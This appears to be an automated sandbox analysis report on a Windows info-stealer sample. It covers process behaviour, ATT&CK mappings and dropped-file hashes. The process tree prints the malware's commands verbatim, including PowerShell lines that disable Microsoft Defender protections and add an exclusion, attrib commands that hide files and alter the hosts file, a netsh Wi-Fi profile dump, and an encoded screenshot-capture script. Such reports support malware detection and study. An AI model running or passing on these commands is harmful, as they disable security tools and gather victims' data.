Token: SeBackupPrivilege	4400	wmic.exe
Token: SeRestorePrivilege	4400	wmic.exe
Token: SeShutdownPrivilege	4400	wmic.exe
Token: SeDebugPrivilege	4400	wmic.exe
Token: SeSystemEnvironmentPrivilege	4400	wmic.exe
Token: SeRemoteShutdownPrivilege	4400	wmic.exe
Token: SeUndockPrivilege	4400	wmic.exe
Token: SeManageVolumePrivilege	4400	wmic.exe
Token: 33	4400	wmic.exe
Token: 34	4400	wmic.exe
Token: 35	4400	wmic.exe
Token: 36	4400	wmic.exe
Token: SeIncreaseQuotaPrivilege	5004	wmic.exe
Token: SeSecurityPrivilege	5004	wmic.exe
Token: SeTakeOwnershipPrivilege	5004	wmic.exe
Token: SeLoadDriverPrivilege	5004	wmic.exe
Token: SeSystemProfilePrivilege	5004	wmic.exe
Token: SeSystemtimePrivilege	5004	wmic.exe
Token: SeProfSingleProcessPrivilege	5004	wmic.exe
Token: SeIncBasePriorityPrivilege	5004	wmic.exe
Token: SeCreatePagefilePrivilege	5004	wmic.exe
Token: SeBackupPrivilege	5004	wmic.exe
Token: SeRestorePrivilege	5004	wmic.exe
Token: SeShutdownPrivilege	5004	wmic.exe
Token: SeDebugPrivilege	5004	wmic.exe
Token: SeSystemEnvironmentPrivilege	5004	wmic.exe
Token: SeRemoteShutdownPrivilege	5004	wmic.exe
Token: SeUndockPrivilege	5004	wmic.exe
Token: SeManageVolumePrivilege	5004	wmic.exe
Token: 33	5004	wmic.exe
Token: 34	5004	wmic.exe
Token: 35	5004	wmic.exe
Token: 36	5004	wmic.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3616 wrote to memory of 1008	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	84
PID 3616 wrote to memory of 1008	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	84
PID 3616 wrote to memory of 2968	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	85
PID 3616 wrote to memory of 2968	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	85
PID 3616 wrote to memory of 4400	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	86
PID 3616 wrote to memory of 4400	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	86
PID 3616 wrote to memory of 5004	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	89
PID 3616 wrote to memory of 5004	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	89
PID 3616 wrote to memory of 64	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	90
PID 3616 wrote to memory of 64	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	90
PID 3616 wrote to memory of 2236	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	91
PID 3616 wrote to memory of 2236	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	91
PID 3616 wrote to memory of 4748	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	92
PID 3616 wrote to memory of 4748	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	92
PID 3616 wrote to memory of 4640	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	93
PID 3616 wrote to memory of 4640	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	93
PID 3616 wrote to memory of 3756	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	94
PID 3616 wrote to memory of 3756	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	94
PID 3616 wrote to memory of 4564	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	95
PID 3616 wrote to memory of 4564	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	95
PID 3616 wrote to memory of 4532	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	96
PID 3616 wrote to memory of 4532	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	96
PID 3616 wrote to memory of 3268	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	97
PID 3616 wrote to memory of 3268	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	97
PID 3616 wrote to memory of 3676	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	98
PID 3616 wrote to memory of 3676	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	98
PID 3616 wrote to memory of 3000	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	99
PID 3616 wrote to memory of 3000	3616	2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe	99
PID 3000 wrote to memory of 1288	3000	powershell.exe	100
PID 3000 wrote to memory of 1288	3000	powershell.exe	100
PID 1288 wrote to memory of 3724	1288	csc.exe	101
PID 1288 wrote to memory of 3724	1288	csc.exe	101

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1008	attrib.exe
2968	attrib.exe
4532	attrib.exe
3268	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3616
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
  2⤵
  - Views/modifies file attributes
  PID:1008
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:2968
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4400
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Suspicious use of AdjustPrivilegeToken
  PID:5004
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024-12-13_c31b7327783e94ba4d33daee19d13126_frostygoop_luca-stealer_ngrbot_poet-rat_snatch.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:64
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  PID:2236
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  PID:4748
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3756
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:4564
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:4532
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:3268
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Network Configuration Discovery: Wi-Fi Discovery
  PID:3676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3000
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nc0ojagg\nc0ojagg.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8DE.tmp" "c:\Users\Admin\AppData\Local\Temp\nc0ojagg\CSCAA2F4DBCA6004A0295C4BB1B22CB730.TMP"
      4⤵
      PID:3724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\LU7GHDLAlF\Display (1).png

Filesize
419KB

MD5
efeeebb1d4a8f9fb6baa5c3a98ceff63

SHA1
fbf9e22f2e9df5bf2a23a5b447a913bc04e2bbf3

SHA256
30414b872b20868db04a3d96795b62ac6def30116fe8fb1f557651c3f6ea1f0c

SHA512
4f547b78cb79bc5b51544b947d10617b9328efa7bb3a0b7d4fa3f7cefaff74c4c227aea4b636cc962d672d2f8ca88ccdd7514f6216c7b258fd1cbfe7fa2eb49a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC8DE.tmp

Filesize
1KB

MD5
1d436d9cd3bb3910d1efec911eb7ae9a

SHA1
fb85fb02d890b6e0f6324206fe6c404f7976701a

SHA256
0093630430caf8d1a1c431c5063a40a9cc3f5a74510ccff0593bb3e965c1dc50

SHA512
813f1fa38198864eb4f07b1f3cb7ea04d2c6ee4fa755fe7333e597e4323b1daeee4f62dea115f6481e6c60f10945fb8c2ff3eee986a3012b834c8e69959deeb6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y5gqpf2b.hjy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nc0ojagg\nc0ojagg.dll

Filesize
4KB

MD5
5a3ab68c9cae9c1223ab165d4b48d175

SHA1
c93d0dd082b3363382b74442630c5973248837c5

SHA256
9117886ec853f49b0def7c6b5c2d32b0d49be921c44b7f420049d21f0b5863db

SHA512
5c35a7746dc88cfa68720d21ae0a7fef7275015627b5fc926b088c081a2a7ad2837f00b41cbc9ba0d00813cf92fc219c6a805c064005a9c033efe93a54aadc66

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
14.2MB

MD5
c31b7327783e94ba4d33daee19d13126

SHA1
fe4c6ef4372800cb9344ea79089a886b9fc483bb

SHA256
1ee7c8f4ec2d4fde0a8dcd33c6ec12e80479ce99e9b3efdb430a1d408487fc41

SHA512
1c79aac263598034b8baca1b2031f8e126930cc869ee34fff692a96cf81a4c43b7b0b6017335b7dfcde33f222709dc6fa3f2198e7af107a185040d8b1b8da9a7

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ojagg\CSCAA2F4DBCA6004A0295C4BB1B22CB730.TMP

Filesize
652B

MD5
eb143531d023fc711face9d989847df3

SHA1
50c357c74fdfc540825628dfa6cfe9693c16a05f

SHA256
871184014a02f60adc167b4140a14301a17dc747744a65817c8f25ec269461cc

SHA512
8575cdf58a73a1da91afb09d957ed279a5f07f29591d347c3c7726a8124c7f4442019888185e55323329278437e6d7dc5ec9cf6cdafc283b6ba791ffd7ae1957

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ojagg\nc0ojagg.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nc0ojagg\nc0ojagg.cmdline

Filesize
607B

MD5
3c8db633202fbec512a1f1e5a214a251

SHA1
847a52f37c9eb78f41e0bb22bbebf57e879a7679

SHA256
456913c709b8aa4304ba67b275680dfec1e66fc8314de44ed7a891226a1e610a

SHA512
21209931723ddc65acca91eb966fcd49d2a77ea358c9b33ae88519aa335fe8d48bf10a843a21bb3f75edad83baf54302121ffaa0474a027eabac1451f1662351

Download Submit
memory/64-8-0x0000018AF2790000-0x0000018AF27B2000-memory.dmp

Filesize
136KB

Download
memory/3000-56-0x000001D7C7E60000-0x000001D7C7E68000-memory.dmp

Filesize
32KB

Download